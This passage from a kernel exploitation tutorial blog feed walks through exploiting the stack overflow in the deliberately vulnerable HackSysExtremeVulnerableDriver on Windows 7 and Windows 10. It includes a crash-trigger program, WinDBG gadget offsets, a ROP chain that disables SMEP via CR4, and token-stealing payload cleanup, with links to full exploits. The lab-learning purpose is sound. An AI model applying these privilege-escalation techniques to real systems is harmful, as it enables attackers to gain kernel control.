CR4</a> if you’re using a Hyper-V instance.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Virtualization-based security (VBS) Virtualization-based security (VBS) enhancements provide another layer of protection against attempts to execute malicious code in the kernel. For example, Device Guard blocks code execution in a non-signed area in kernel memory, including kernel EoP code. Enhancements in Device Guard also protect key MSRs, control registers, and descriptor table registers. Unauthorized modifications of the CR4 control register bitfields, including the SMEP field, are blocked instantly. </code></pre></div></div> <p>Gadgets we’ll be using all exist in <code class="highlighter-rouge">ntoskrnl.exe</code> which we’re able to get its base address using <code class="highlighter-rouge">EnumDrivers</code> (some say it’s not reliable but I didn’t run into issues, but given its behaviour isn’t publicly documented you better cross your fingers) or by calling <code class="highlighter-rouge">NtQuerySystemInformation</code> (you’ll need to export it first), we’ll be using the first approach.</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">LPVOID</span> <span class="n">addresses</span><span class="p">[</span><span class="mi">1000</span><span class="p">];</span> <span class="n">DWORD</span> <span class="n">needed</span><span class="p">;</span> <span class="n">EnumDeviceDrivers</span><span class="p">(</span><span class="n">addresses</span><span class="p">,</span> <span class="mi">1000</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">needed</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"[+] Address of ntoskrnl.exe: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">addresses</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> </code></pre></div></div> <p>Okay, now that we have <code class="highlighter-rouge">nt</code>’s base address, we can rely on finding relative offsets to it for calculating the ROP chain’s gadgets.</p> <p>I referred to ptsecurity’s <a href="http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html">post</a> on finding the gadgets.</p> <p>First gadget we need should allow us to pop a value into the <code class="highlighter-rouge">cr4</code> registe. Once we find one, we’ll be able to figure out which register we need to control its content next.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; uf nt!KiConfigureDynamicProcessor nt!KiConfigureDynamicProcessor: fffff802`2cc36ba8 sub rsp,28h fffff802`2cc36bac call nt!KiEnableXSave (fffff802`2cc2df48) fffff802`2cc36bb1 add rsp,28h fffff802`2cc36bb5 ret kd&gt; uf fffff802`2cc2df48 nt!KiEnableXSave: fffff802`2cc2df48 mov rcx,cr4 fffff802`2cc2df4b test qword ptr [nt!KeFeatureBits (fffff802`2cc0b118)],800000h ... snip ... nt!KiEnableXSave+0x39b0: fffff802`2cc318f8 btr rcx,12h fffff802`2cc318fd mov cr4,rcx // First gadget! fffff802`2cc31900 ret kd&gt; ? fffff802`2cc318fd - nt Evaluate expression: 4341861 = 00000000`00424065 </code></pre></div></div> <p><strong>Gadget #1 is <code class="highlighter-rouge">mov cr4,rcx</code> at <code class="highlighter-rouge">nt + 0x424065</code>!</strong></p> <p>Now we need a way to control <code class="highlighter-rouge">rcx</code>’s content, ptsecurity’s post mentions <code class="highlighter-rouge">HvlEndSystemInterrupt</code> as a good target:</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; uf HvlEndSystemInterrupt nt!HvlEndSystemInterrupt: fffff802`cdb76b60 push rcx fffff802`cdb76b62 push rax fffff802`cdb76b63 push rdx fffff802`cdb76b64 mov rdx,qword ptr gs:[6208h] fffff802`cdb76b6d mov ecx,40000070h fffff802`cdb76b72 btr dword ptr [rdx],0 fffff802`cdb76b76 jb nt!HvlEndSystemInterrupt+0x1e (fffff802`cdb76b7e) Branch nt!HvlEndSystemInterrupt+0x18: fffff802`cdb76b78 xor eax,eax fffff802`cdb76b7a mov edx,eax fffff802`cdb76b7c wrmsr nt!HvlEndSystemInterrupt+0x1e: fffff802`cdb76b7e pop rdx fffff802`cdb76b7f pop rax fffff802`cdb76b80 pop rcx // Second gadget! fffff802`cdb76b81 ret kd&gt; ? fffff802`cdb76b80 - nt Evaluate expression: 1514368 = 00000000`00171b80 </code></pre></div></div> <p><strong>Gadget #2 is <code class="highlighter-rouge">pop rcx</code> at <code class="highlighter-rouge">nt + 0x171b80</code>!</strong></p> <p>ROP chain will be the following:</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+------------------+ |pop rcx; ret | // nt + 0x424065 +------------------+ |value of rcx | // ? @cr4 &amp; FFFFFFFF`FFEFFFFF +------------------+ |mov cr4, rcx; ret | // nt + 0x424065 +------------------+ |addr of payload | // Available from user-mode +------------------+ </code></pre></div></div> <p>It’s extremely important to notice that writing more than 8 bytes starting the RIP offset means the next stack frame gets corrupted. Returning to</p> <h3 id="3-restoring-execution-flow">3. Restoring execution flow</h3> <p>Let’s take one more look on the stack call BEFORE the <code class="highlighter-rouge">memset</code> call:</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Breakpoint 1 hit HEVD!TriggerStackOverflow: fffff801`71025640 mov qword ptr [rsp+8],rbx kd&gt; k # Child-SP RetAddr Call Site 00 ffff830f`5a53a798 fffff801`7102572a HEVD!TriggerStackOverflow [c:\hacksysextremevulnerabledriver\driver\stackoverflow.c @ 65] 01 ffff830f`5a53a7a0 fffff801`710262a5 HEVD!StackOverflowIoctlHandler+0x1a [c:\hacksysextremevulnerabledriver\driver\stackoverflow.c @ 125] 02 ffff830f`5a53a7d0 fffff801`714b02d9 HEVD!IrpDeviceIoCtlHandler+0x149 [c:\hacksysextremevulnerabledriver\driver\hacksysextremevulnerabledriver.c @ 229] 03 ffff830f`5a53a800 fffff801`7190fefe nt!IofCallDriver+0x59 04 ffff830f`5a53a840 fffff801`7190f73c nt!IopSynchronousServiceTail+0x19e </code></pre></div></div> <h4 id="pitfall-1-returning-to-stackoverflowioctlhandler0x1a">Pitfall 1: returning to <code class="highlighter-rouge">StackOverflowIoctlHandler+0x1a</code></h4> <p>Although adjusting the stack to return to this call works, a parameter on the stack (<code class="highlighter-rouge">Irp</code>’s address) gets overwritten thanks to the ROP chain and is not recoverable as far as I know. This results in an access violation later on.</p> <p>Assembly at <code class="highlighter-rouge">TriggerStackOverflow+0xbc</code>:</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fffff801`710256f4 lea r11,[rsp+820h] fffff801`710256fc mov rbx,qword ptr [r11+10h] // RBX should contain Irp's address, this is now overwritten to the new cr4 value </code></pre></div></div> <p>This results in <code class="highlighter-rouge">rbx</code> (previously holding <code class="highlighter-rouge">Irp</code>’s address for <code class="highlighter-rouge">IrpDeviceIoCtlHandler</code> call) to hold the new <code class="highlighter-rouge">cr4</code> address and later on being accessed, results in a BSOD.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fffff801`f88d63e0 and qword ptr [rbx+38h],0 ds:002b:00000000`000706b0=???????????????? </code></pre></div></div> <p>Notice that <code class="highlighter-rouge">rbx</code> holds <code class="highlighter-rouge">cr4</code>’s new value. This instructions maps to</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Irp</span><span class="o">-&gt;</span><span class="n">IoStatus</span><span class="p">.</span><span class="n">Information</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </code></pre></div></div> <p>in <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/64f2e9a1eadc7974bfc151258751f6218c469530/Driver/HackSysExtremeVulnerableDriver.c#L289"><code class="highlighter-rouge">IrpDeviceIoCtlHandler</code></a>.</p> <p>So, returning to <code class="highlighter-rouge">StackOverflowIoctlHandler+0x1a</code> is not an option.</p> <h4 id="pitfall-2-returning-to-hevdirpdeviceioctlhandler0x149">Pitfall 2: Returning to <code class="highlighter-rouge">HEVD!IrpDeviceIoCtlHandler+0x149</code></h4> <p>Same issue as above, <code class="highlighter-rouge">Irp</code>’s address is corrupted and lost for good. Following instructions result in access violation.</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Irp</span><span class="o">-&gt;</span><span class="n">IoStatus</span><span class="p">.</span><span class="n">Status</span> <span class="o">=</span> <span class="n">Status</span><span class="p">;</span> <span class="n">Irp</span><span class="o">-&gt;</span><span class="n">IoStatus</span><span class="p">.</span><span class="n">Information</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </code></pre></div></div> <p>You can make <code class="highlighter-rouge">rbx</code> point to some writable location but good luck having a valid <code class="highlighter-rouge">Irp</code> struct that passes the following call.</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Complete the request </span><span class="n">IoCompleteRequest</span><span class="p">(</span><span class="n">Irp</span><span class="p">,</span> <span class="n">IO_NO_INCREMENT</span><span class="p">);</span> </code></pre></div></div> <p>Another dead end.</p> <h4 id="pitfall-3-more-access-violations">Pitfall 3: More access violations</h4> <p>Now we go one more level up the stack, to <code class="highlighter-rouge">nt!IofCallDriver+0x59</code>. Jumping to this code DOES work but still, access violation in <code class="highlighter-rouge">nt</code> occurs.</p> <p>It’s extremely important (and I mean it) to take note of all the registers how they behave when you make the IOCTL code in both a normal (non-exploiting) and exploitable call.</p> <p>In our case, <code class="highlighter-rouge">rdi</code> and <code class="highlighter-rouge">rsi</code> registers are the offending ones. Unluckily for us, in <code class="highlighter-rouge">x64</code>, parameters are passed in registers and those two registers get populated in <code class="highlighter-rouge">HEVD!TriggerStackOverflow</code>.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fffff800`185756f4 lea r11,[rsp+820h] fffff800`185756fc mov rbx,qword ptr [r11+10h] fffff800`18575700 mov rsi,qword ptr [r11+18h] // Points to our first gadget fffff800`18575704 mov rsp,r11 fffff800`18575707 pop rdi // Points to our corrupted buffer ("AAAAAAAA") fffff800`18575708 ret </code></pre></div></div> <p>Now those two registers are both set to zero if you submit an input buffer that doesn’t result in a RET overwrite (you can check this by sending a small buffer and checking the registers contents before you return from <code class="highlighter-rouge">TriggerStackOverflow</code>). This is no longer the case when you mess up the stack.</p> <p>Now sometime after hitting <code class="highlighter-rouge">nt!IofCallDriver+0x59</code></p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; u @rip nt!ObfDereferenceObject+0x5: fffff800`152381c5 mov qword ptr [rsp+10h],rsi fffff800`152381ca push rdi fffff800`152381cb sub rsp,30h fffff800`152381cf cmp dword ptr [nt!ObpTraceFlags (fffff800`15604004)],0 fffff800`152381d6 mov rsi,rcx fffff800`152381d9 jne nt!ObfDereferenceObject+0x160d16 (fffff800`15398ed6) fffff800`152381df or rbx,0FFFFFFFFFFFFFFFFh fffff800`152381e3 lock xadd qword ptr [rsi-30h],rbx kd&gt; ? @rsi Evaluate expression: -8795734228891 = fffff800`1562c065 // Address of mov cr4,rcx instead of 0 kd&gt; ? @rdi Evaluate expression: 4702111234474983745 = 41414141`41414141 // Some offset from our buffer instead of 0 </code></pre></div></div> <p>Now that those registers are corrupted, we can just reset their expected value (zeroeing them out) sometime before this code is ever hit. A perfect place for this is after we execute our token stealing payload.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xor rsi, rsi xor rdi, rdi </code></pre></div></div> <p>Last step would be adjusting the stack properly to point to <code class="highlighter-rouge">nt!IofCallDriver+0x59</code>’s stack frame by adding <code class="highlighter-rouge">0x40</code> to <code class="highlighter-rouge">rsp</code>.</p> <p>Full exploit code can be found <a href="https://github.com/abatchy17/HEVD-Exploits/tree/master/StackOverflow/Win10_x64">here</a>.</p> <h3 id="4-mitigation-the-vulnerability">4. Mitigation the vulnerability</h3> <p>Although this is a vanilla stack smashing vulnerability, it still happens all the time. Key ways to mitigate/avoid this vulnerability is:</p> <ol> <li>Sanitize the input, don’t trust the user data (or its size). Use upper/lower bounds.</li> <li>Use /GS to utilize stack cookies.</li> </ol> <p>Or even better, don’t write a kernel driver unless you need to ;)</p> <h3 id="5-recap">5. Recap</h3> <ul> <li>Bypassing SMEP might be intimidating at first, but a small ROP chain was able to make it a piece of cake.</li> <li>Restoring execution flow was challenging due to access violations. Every stack frame had its own challenges.</li> <li>Keeping an eye on registers is crucial. Note which registers get affected by your exploit and try to repair them if possible.</li> <li>Offsets change quite often, there’s a good chance this exploit will break with the next update.</li> </ul> <h3 id="5-references">5. References</h3> <ul> <li> <p><a href="http://j00ru.vexillium.org/?p=783">SMEP: What is it, and how to beat it on Windows</a></p> </li> <li> <p><a href="http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html">Bypassing Intel SMEP on Windows 8 x64 Using Return-oriented Programming</a></p> </li> </ul> <p>Whew, done.</p> <hr /> <p>- Abatchy</p> Thu, 11 Jan 2018 00:00:00 +0000 http://abatchy17.github.io/2018/01/kernel-exploitation-4 http://abatchy17.github.io/2018/01/kernel-exploitation-4 [Kernel Exploitation] 3: Stack Buffer Overflow (Windows 7 x86/x64) <p><em>The <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver">HackSysExtremeVulnerableDriver</a> by HackSysTeam always interested me and I got <a href="https://twitter.com/abatchy17/status/939572701345148928">positive feedback</a> on writing about it, so here we are.</em></p> <p><em>Exploit code can be found <a href="https://github.com/abatchy17/HEVD-Exploits/tree/master/StackOverflow">here</a>.</em></p> <hr /> <h3 id="1-understanding-the-vulnerability">1. Understanding the vulnerability</h3> <p>Link to code <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/106e3dd5d9c49326d55ce17c919bffa68ead1467/Driver/StackOverflow.c#L65">here</a>.</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">NTSTATUS</span> <span class="nf">TriggerStackOverflow</span><span class="p">(</span><span class="n">IN</span> <span class="n">PVOID</span> <span class="n">UserBuffer</span><span class="p">,</span> <span class="n">IN</span> <span class="n">SIZE_T</span> <span class="n">Size</span><span class="p">)</span> <span class="p">{</span> <span class="n">NTSTATUS</span> <span class="n">Status</span> <span class="o">=</span> <span class="n">STATUS_SUCCESS</span><span class="p">;</span> <span class="n">ULONG</span> <span class="n">KernelBuffer</span><span class="p">[</span><span class="n">BUFFER_SIZE</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="n">PAGED_CODE</span><span class="p">();</span> <span class="kr">__try</span> <span class="p">{</span> <span class="c1">// Verify if the buffer resides in user mode </span> <span class="n">ProbeForRead</span><span class="p">(</span><span class="n">UserBuffer</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">KernelBuffer</span><span class="p">),</span> <span class="p">(</span><span class="n">ULONG</span><span class="p">)</span><span class="n">__alignof</span><span class="p">(</span><span class="n">KernelBuffer</span><span class="p">));</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] UserBuffer: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">UserBuffer</span><span class="p">);</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] UserBuffer Size: 0x%X</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">Size</span><span class="p">);</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] KernelBuffer: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">KernelBuffer</span><span class="p">);</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] KernelBuffer Size: 0x%X</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">KernelBuffer</span><span class="p">));</span> <span class="cp">#ifdef SECURE </span> <span class="c1">// Secure Note: This is secure because the developer is passing a size </span> <span class="c1">// equal to size of KernelBuffer to RtlCopyMemory()/memcpy(). Hence, </span> <span class="c1">// there will be no overflow </span> <span class="n">RtlCopyMemory</span><span class="p">((</span><span class="n">PVOID</span><span class="p">)</span><span class="n">KernelBuffer</span><span class="p">,</span> <span class="n">UserBuffer</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">KernelBuffer</span><span class="p">));</span> <span class="cp">#else </span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] Triggering Stack Overflow</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">// Vulnerability Note: This is a vanilla Stack based Overflow vulnerability </span> <span class="c1">// because the developer is passing the user supplied size directly to </span> <span class="c1">// RtlCopyMemory()/memcpy() without validating if the size is greater or </span> <span class="c1">// equal to the size of KernelBuffer </span> <span class="n">RtlCopyMemory</span><span class="p">((</span><span class="n">PVOID</span><span class="p">)</span><span class="n">KernelBuffer</span><span class="p">,</span> <span class="n">UserBuffer</span><span class="p">,</span> <span class="n">Size</span><span class="p">);</span> <span class="cp">#endif </span> <span class="p">}</span> <span class="kr">__except</span> <span class="p">(</span><span class="n">EXCEPTION_EXECUTE_HANDLER</span><span class="p">)</span> <span class="p">{</span> <span class="n">Status</span> <span class="o">=</span> <span class="n">GetExceptionCode</span><span class="p">();</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[-] Exception Code: 0x%X</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">Status</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="n">Status</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p><code class="highlighter-rouge">TriggerStackOverflow</code> is called via <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/106e3dd5d9c49326d55ce17c919bffa68ead1467/Driver/StackOverflow.c#L109"><code class="highlighter-rouge">StackOverflowIoctlHandler</code></a>, which is the IOCTL handler for <code class="highlighter-rouge">HACKSYS_EVD_IOCTL_STACK_OVERFLOW</code>.</p> <p>Vulnerability is fairly obvious, a user supplied buffer is copied into a kernel buffer of size 2048 bytes (<code class="highlighter-rouge">512 * sizeof(ULONG)</code>). No boundary check is being made, so this is a classic stack smashing vulnerability.</p> <h3 id="2-triggering-the-crash">2. Triggering the crash</h3> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include &lt;Windows.h&gt; #include &lt;stdio.h&gt; </span> <span class="c1">// IOCTL to trigger the stack overflow vuln, copied from HackSysExtremeVulnerableDriver/Driver/HackSysExtremeVulnerableDriver.h </span><span class="cp">#define HACKSYS_EVD_IOCTL_STACK_OVERFLOW CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_NEITHER, FILE_ANY_ACCESS) </span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="c1">// 1. Create handle to driver </span> <span class="n">HANDLE</span> <span class="n">device</span> <span class="o">=</span> <span class="n">CreateFileA</span><span class="p">(</span> <span class="s">"</span><span class="se">\\\\</span><span class="s">.</span><span class="se">\\</span><span class="s">HackSysExtremeVulnerableDriver"</span><span class="p">,</span> <span class="n">GENERIC_READ</span> <span class="o">|</span> <span class="n">GENERIC_WRITE</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">OPEN_EXISTING</span><span class="p">,</span> <span class="n">FILE_ATTRIBUTE_NORMAL</span> <span class="o">|</span> <span class="n">FILE_FLAG_OVERLAPPED</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"[+] Opened handle to device: 0x%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">device</span><span class="p">);</span> <span class="c1">// 2. Allocate memory to construct buffer for device </span> <span class="kt">char</span><span class="o">*</span> <span class="n">uBuffer</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">VirtualAlloc</span><span class="p">(</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">2200</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"[+] User buffer allocated: 0x%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">uBuffer</span><span class="p">);</span> <span class="n">RtlFillMemory</span><span class="p">(</span><span class="n">uBuffer</span><span class="p">,</span> <span class="mi">2200</span> <span class="p">,</span> <span class="sc">'A'</span><span class="p">);</span> <span class="n">DWORD</span> <span class="n">bytesRet</span><span class="p">;</span> <span class="c1">// 3. Send IOCTL </span> <span class="n">DeviceIoControl</span><span class="p">(</span> <span class="n">device</span><span class="p">,</span> <span class="n">HACKSYS_EVD_IOCTL_STACK_OVERFLOW</span><span class="p">,</span> <span class="n">uBuffer</span><span class="p">,</span> <span class="mi">2200</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">bytesRet</span><span class="p">,</span> <span class="nb">NULL</span> <span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <p>Now compile this code and copy it over to the VM. Make sure a WinDBG session is active and run the executable from a shell. Machine should freeze and WinDBG should (okay, maybe will) flicker on your debugging machine.</p> <p>HEVD shows you debugging info with verbose debugging enabled:</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>****** HACKSYS_EVD_STACKOVERFLOW ****** [+] UserBuffer: 0x000D0000 [+] UserBuffer Size: 0x1068 [+] KernelBuffer: 0xA271827C [+] KernelBuffer Size: 0x800 [+] Triggering Stack Overflow </code></pre></div></div> <p>Enter <code class="highlighter-rouge">k</code> to show the stack trace, you should see something similar to this:</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; k # ChildEBP RetAddr 00 8c812d0c 8292fce7 nt!RtlpBreakWithStatusInstruction 01 8c812d5c 829307e5 nt!KiBugCheckDebugBreak+0x1c 02 8c813120 828de3c1 nt!KeBugCheck2+0x68b 03 8c8131a0 82890be8 nt!MmAccessFault+0x104 04 8c8131a0 82888ff3 nt!KiTrap0E+0xdc 05 8c813234 93f666be nt!memcpy+0x33 06 8c813a98 41414141 HEVD!TriggerStackOverflow+0x94 [c:\hacksysextremevulnerabledriver\driver\stackoverflow.c @ 92] WARNING: Frame IP not in any known module. Following frames may be wrong. 07 8c813aa4 41414141 0x41414141 08 8c813aa8 41414141 0x41414141 09 8c813aac 41414141 0x41414141 0a 8c813ab0 41414141 0x41414141 0b 8c813ab4 41414141 0x41414141 </code></pre></div></div> <p>If you continue execution, 0x41414141 will be popped into EIP. That wasn’t so complicated :)</p> <hr /> <h3 id="3-controlling-execution-flow">3. Controlling execution flow</h3> <p>Exploitation is straightforward with a token-stealing payload described in part 2. The payload will be constructed in user-mode and its address passed as the return address. When the function exists, execution is redirected to the user-mode buffer. This is called a privilege escalation exploit as you’re executing code with higher privileges than you’re supposed to have.</p> <p>Since <a href="http://j00ru.vexillium.org/?p=783">SMEP</a> is not enabled on Windows 7, we can point jump to a payload in user-mode and get it executed with kernel privileges.</p> <p>Now restart the vm <code class="highlighter-rouge">.reboot</code> and let’s put a breakpoint at function start and end. To know where the function returns, use <code class="highlighter-rouge">uf</code> and calculate the offset.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; uf HEVD!TriggerStackOverflow HEVD!TriggerStackOverflow [c:\hacksysextremevulnerabledriver\driver\stackoverflow.c @ 65]: 65 9176b62a push 80Ch 65 9176b62f push offset HEVD!__safe_se_handler_table+0xc8 (917691d8) 65 9176b634 call HEVD!__SEH_prolog4 (91768014) ... 101 9176b6ed call HEVD!__SEH_epilog4 (91768059) 101 9176b6f2 ret 8 kd&gt; ? 9176b6f2 - HEVD!TriggerStackOverflow Evaluate expression: 200 = 000000c8 kd&gt; bu HEVD!TriggerStackOverflow kd&gt; bu HEVD!TriggerStackOverflow + 0xc8 kd&gt; bl 0 e Disable Clear 9176b62a 0001 (0001) HEVD!TriggerStackOverflow 1 e Disable Clear 9176b6f2 0001 (0001) HEVD!TriggerStackOverflow+0xc8 </code></pre></div></div> <p>Next, we need to locate RET’s offset:</p> <ul> <li>At <code class="highlighter-rouge">HEVD!TriggerStackOverflow+0x26</code>, <code class="highlighter-rouge">memset</code> is called with the kernel buffer address stored at <code class="highlighter-rouge">@eax</code>. Step over till you reach that instruction.</li> <li><code class="highlighter-rouge">@ebp + 4</code> points to the stored RET address. We can calculate the offset from the kernel buffer.</li> </ul> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; ? (@ebp + 4) - @eax Evaluate expression: 2076 = 0000081c </code></pre></div></div> <p>We now know that the return address is stored <strong>2076</strong> bytes away from the start of the kernel buffer!</p> <p>The big question is, where should you go after payload is executed?</p> <hr /> <h3 id="4-cleanup">4. Cleanup</h3> <p>Let’s re-think what we’re doing. Overwriting the return address of the first function on the stack means this function’s remaining instructions won’t be reached. In our case, this function is <code class="highlighter-rouge">StackOverflowIoctlHandler</code> at offset <code class="highlighter-rouge">0x1e</code>.</p> <p><img src="http://abatchy17.github.io/images/kernel2.png" alt="WinDBG_screenshot_2" /></p> <p>Only two missing instructions need to be executed at the end of our payload:</p> <div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mi">9176</span><span class="n">b718</span> <span class="k">pop</span> <span class="n">ebp</span> <span class="mi">9176</span><span class="n">b719</span> <span class="k">ret</span> <span class="mi">8</span> </code></pre></div></div> <p>We’re still missing something. This function expects a return value in <code class="highlighter-rouge">@eax</code>, anything other than 0 will be treated as a failure, so let’s fix that before we execute the prologue.</p> <div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">xor</span> <span class="n">eax</span><span class="p">,</span> <span class="n">eax</span> <span class="c">; Set NTSTATUS SUCCEESS</span> </code></pre></div></div> <p>The full exploit can be found <a href="https://github.com/abatchy17/HEVD-Exploits/tree/master/StackOverflow/Win7_x86_SP1">here</a>. Explanation of payload <a href="http://abatchy17.github.io/kernel-exploitation-2#token-stealing-payload-windows-7-x86-sp1">here</a>.</p> <p><img src="http://abatchy17.github.io/images/kernel3.png" alt="Exploit_screenshot_2" /></p> <hr /> <h3 id="5-porting-the-exploit-to-windows-7-64-bit">5. Porting the exploit to Windows 7 64-bit</h3> <p>Porting this one is straightforward:</p> <ul> <li> <p>Offset to kernel buffer becomes <strong>2056</strong> instead of 2076.</p> </li> <li> <p><a href="http://abatchy17.github.io/kernel-exploitation-2#token-stealing-payload-windows-7-x64-sp1">x64 compatible payload.</a>.</p> </li> <li> <p>Addresses are 8 bytes long, required some modifications.</p> </li> <li> <p>No additional relevant protection is enabled.</p> </li> </ul> <p><img src="http://abatchy17.github.io/images/kernel4.png" alt="Exploit_screenshot_2" /></p> <p>Full exploit <a href="https://github.com/abatchy17/HEVD-Exploits/tree/master/StackOverflow/Win7_x64_SP1">here</a>.</p> <hr /> <h3 id="6-recap">6. Recap</h3> <ul> <li> <p>A user-supplied buffer is being copied to a kernel buffer without boundary check, resulting in a class stack smashing vulnerability.</p> </li> <li> <p>Function return address is controllable and can be pointed to a user-mode buffer as SMEP is not enabled.</p> </li> <li> <p>Payload has to exist in an R?X memory segment, otherwise DEP will block the attempt.</p> </li> <li> <p>No exceptions can be ignored, which means we have to patch the execution path after payload is executed. In our case that consisted of 1) setting the return value to 0 in <code class="highlighter-rouge">@eax</code> and 2) execute the remaining instructions in <code class="highlighter-rouge">StackOverflowIoctlHandler</code> before returning.</p> </li> </ul> <hr /> <p>That’s it! Part 4 will be exploiting this on Windows 10 with SMEP bypass!</p> <p>- Abatchy</p> Tue, 02 Jan 2018 10:00:00 +0000 http://abatchy17.github.io/2018/01/kernel-exploitation-3 http://abatchy17.github.io/2018/01/kernel-exploitation-3 [Kernel Exploitation] 2: Payloads <p><em>This post is dedicated to dissecting payloads to be used later on in this tutorial. Whenever a payload is used, it will be added here.</em></p> <p><em>Repo with all code can be found <a href="https://github.com/abatchy17/HEVD-Exploits">here</a>.</em></p> <hr /> <ol> <li><a href="#token-stealing-payload">Token Stealing Payload</a> <ul> <li><a href="#token-stealing-payload-windows-7-x86-sp1">Windows 7 - x86 SP1</a></li> <li><a href="#token-stealing-payload-windows-7-x64-sp1">Windows 7 - x64 SP1</a></li> </ul> </li> </ol> <h3 id="some-notes-to-keep-in-mind">Some notes to keep in mind</h3> <ul> <li> <p>Sometimes you’re able to control the return address of a function, in this case you can point it to your user-mode buffer only if <a href="http://j00ru.vexillium.org/?p=783">SMEP</a> is disabled.</p> </li> <li> <p>Payloads <strong>have to</strong> reside in an executable memory segment. If you define it as a read-only hex string or any other combination that doesn’t have execute permissions, shellcode execution will fail due to DEP (Data Execution Prevention).</p> </li> <li> <p>Payloads are in assembly. Unless you enjoy copying hex strings, I recommend compiling ASM on the fly in a Visual Studio project. This works for x86 and x64 payloads and saves you the headache of removing function prologues/epilogues, creating a RWX buffer and copying shellcode or not being able to write x64 ASM inline.</p> </li> </ul> <p>Setup can be found <a href="http://lallouslab.net/2016/01/11/introduction-to-writing-x64-assembly-in-visual-studio/">here</a>.</p> <p>Lots of other options exist like 1) using masm and copying shellcode to a RWX buffer at runtime, 2) using a naked function but that’s only for x86 or 3) inline ASM which again works only for x86.</p> <h3 id="generic-x86-payload-wrapper">Generic x86 payload wrapper</h3> <div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">.</span><span class="mi">386</span> <span class="p">.</span><span class="n">model</span> <span class="n">flat</span><span class="p">,</span> <span class="n">c</span> <span class="c">; cdecl / stdcall</span> <span class="n">ASSUME</span> <span class="n">FS</span><span class="o">:</span><span class="n">NOTHING</span> <span class="p">.</span><span class="n">code</span> <span class="n">PUBLIC</span> <span class="n">PAYLOAD</span> <span class="n">PAYLOAD</span> <span class="n">proc</span> <span class="c">; Payload here</span> <span 